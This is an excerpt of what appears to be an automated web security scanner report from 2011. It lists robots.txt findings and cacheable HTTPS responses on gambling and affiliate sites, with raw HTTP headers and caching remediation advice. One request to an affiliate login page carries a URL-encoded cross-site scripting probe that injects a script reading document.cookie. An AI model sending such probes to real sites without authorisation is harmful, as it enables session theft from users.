Host:	http://www.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=mb0tfa4fuqcus8rlegc46fsg84; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[sessionId]=103122745; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540140; expires=Tue, 15-May-2012 11:41:25 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:25 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.101. http://www.youtube.com/v/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/v/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:37 GMT
ETag: "21b-4a32038f98440"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

24. Cacheable HTTPS response previous next
There are 52 instances of this issue:

https://in.getclicky.com/
https://sealinfo.verisign.com/splash
https://www.aspireaffiliates.com/
https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx
https://www.aspireaffiliates.com/marketing-samples/
https://www.aspireaffiliates.com/mobile/
https://www.betsson.com/en/customer-service/
https://www.betsson.com/en/customer-service/forgotten-password/
https://www.betsson.com/en/customer-service/privacy-statement/
https://www.betsson.com/en/customer-service/responsible-gaming/
https://www.betsson.com/en/customer-service/terms/index.asp
https://www.betsson.com/my-account/refer-a-friend/index.asp
https://www.interwetten.com/en/Default.aspx
https://www.interwetten.com/en/american-football-betting
https://www.interwetten.com/en/australian-rules-football-betting
https://www.interwetten.com/en/beach-soccer-betting
https://www.interwetten.com/en/boxing-betting
https://www.interwetten.com/en/casino/default.aspx
https://www.interwetten.com/en/cycling-betting
https://www.interwetten.com/en/darts-betting
https://www.interwetten.com/en/football-betting
https://www.interwetten.com/en/games/default.aspx
https://www.interwetten.com/en/golf-betting
https://www.interwetten.com/en/handball-betting
https://www.interwetten.com/en/ice-hockey-betting
https://www.interwetten.com/en/livebets
https://www.interwetten.com/en/motorbikes-betting
https://www.interwetten.com/en/online-skillgames
https://www.interwetten.com/en/politics-betting
https://www.interwetten.com/en/rugby-betting
https://www.interwetten.com/en/sailing-betting
https://www.interwetten.com/en/scratch/default.aspx
https://www.interwetten.com/en/ski-alpine-betting
https://www.interwetten.com/en/skill/default.aspx
https://www.interwetten.com/en/sportsbook/default.aspx
https://www.interwetten.com/en/tennis-betting
https://www.interwetten.com/en/volleyball-betting
https://www.interwetten.com/en/water-polo-betting
https://www.interwetten.com/en/winter-games-betting
https://www.norskelodd.com/no/
https://www.norskelodd.com/no/FAQ
https://www.norskelodd.com/no/aboutus/
https://www.norskelodd.com/no/charity/
https://www.norskelodd.com/no/default.aspx
https://www.norskelodd.com/no/fair-play/
https://www.norskelodd.com/no/forgotten-password
https://www.norskelodd.com/no/play/3Wow
https://www.norskelodd.com/no/play/7thHeaven
https://www.norskelodd.com/no/play/GonzosQuest
https://www.norskelodd.com/no/promotions/
https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm
https://www.thawte.com/

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

24.1. https://in.getclicky.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://in.getclicky.com
Path:	/

Request

GET / HTTP/1.1
Host: in.getclicky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cluid=6787569821139589215;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Length: 4
Connection: close
Content-Type: text/html

Hmm.

24.2. https://sealinfo.verisign.com/splash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sealinfo.verisign.com
Path:	/splash

Request

GET /splash HTTP/1.1
Host: sealinfo.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:10:53 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close

24.3. https://www.aspireaffiliates.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/

Request

GET / HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/WebSite/Affiliates/login.aspx

Request

GET /WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

24.5. https://www.aspireaffiliates.com/marketing-samples/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/marketing-samples/

Request

Response

24.6. https://www.aspireaffiliates.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.aspireaffiliates.com
Path:	/mobile/

Request

Response

24.7. https://www.betsson.com/en/customer-service/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/

Request

GET /en/customer-service/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.8. https://www.betsson.com/en/customer-service/forgotten-password/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/forgotten-password/

Request

GET /en/customer-service/forgotten-password/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.9. https://www.betsson.com/en/customer-service/privacy-statement/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/privacy-statement/

Request

GET /en/customer-service/privacy-statement/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.10. https://www.betsson.com/en/customer-service/responsible-gaming/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/responsible-gaming/

Request

GET /en/customer-service/responsible-gaming/ HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.11. https://www.betsson.com/en/customer-service/terms/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/en/customer-service/terms/index.asp

Request

GET /en/customer-service/terms/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.betsson.com
Path:	/my-account/refer-a-friend/index.asp

Request

GET /my-account/refer-a-friend/index.asp HTTP/1.1
Host: www.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.13. https://www.interwetten.com/en/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/Default.aspx

Request

Response

24.14. https://www.interwetten.com/en/american-football-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/american-football-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:09 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:09 GMT
Connection: close
Content-Length: 223280
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.15. https://www.interwetten.com/en/australian-rules-football-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/australian-rules-football-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:32 GMT
Connection: close
Content-Length: 223367
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.16. https://www.interwetten.com/en/beach-soccer-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/beach-soccer-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:21 GMT
Connection: close
Content-Length: 221952
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.17. https://www.interwetten.com/en/boxing-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/boxing-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223215
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.18. https://www.interwetten.com/en/casino/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/casino/default.aspx

Request

Response

24.19. https://www.interwetten.com/en/cycling-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/cycling-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:41 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:41 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:40 GMT
Connection: close
Content-Length: 223291
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.20. https://www.interwetten.com/en/darts-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/darts-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:12 GMT
Connection: close
Content-Length: 224110
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.21. https://www.interwetten.com/en/football-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/football-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:13 GMT
Connection: close
Content-Length: 261103
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.22. https://www.interwetten.com/en/games/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/games/default.aspx

Request

Response

24.23. https://www.interwetten.com/en/golf-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/golf-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223229
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.24. https://www.interwetten.com/en/handball-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/handball-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:21 GMT
Connection: close
Content-Length: 226608
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.25. https://www.interwetten.com/en/ice-hockey-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/ice-hockey-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 225740
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.26. https://www.interwetten.com/en/livebets previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/livebets

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:07 GMT
Connection: close
Content-Length: 222401
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.27. https://www.interwetten.com/en/motorbikes-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/motorbikes-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:02 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:01 GMT
Connection: close
Content-Length: 224123
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.28. https://www.interwetten.com/en/online-skillgames previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/online-skillgames

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

24.29. https://www.interwetten.com/en/politics-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/politics-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 221965
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.30. https://www.interwetten.com/en/rugby-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/rugby-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:31 GMT
Connection: close
Content-Length: 225818
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.31. https://www.interwetten.com/en/sailing-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/sailing-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:29 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:28 GMT
Connection: close
Content-Length: 223288
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.32. https://www.interwetten.com/en/scratch/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/scratch/default.aspx

Request

Response

24.33. https://www.interwetten.com/en/ski-alpine-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/ski-alpine-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223263
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.34. https://www.interwetten.com/en/skill/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/skill/default.aspx

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

24.35. https://www.interwetten.com/en/sportsbook/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/sportsbook/default.aspx

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:01 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:01 GMT
Content-Length: 321963
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.36. https://www.interwetten.com/en/tennis-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/tennis-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:08 GMT
Connection: close
Content-Length: 228946
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.37. https://www.interwetten.com/en/volleyball-betting previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.interwetten.com
Path:	/en/volleyball-betting

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:10 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:10 GMT
Connection: close
Content-Length: 223303
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
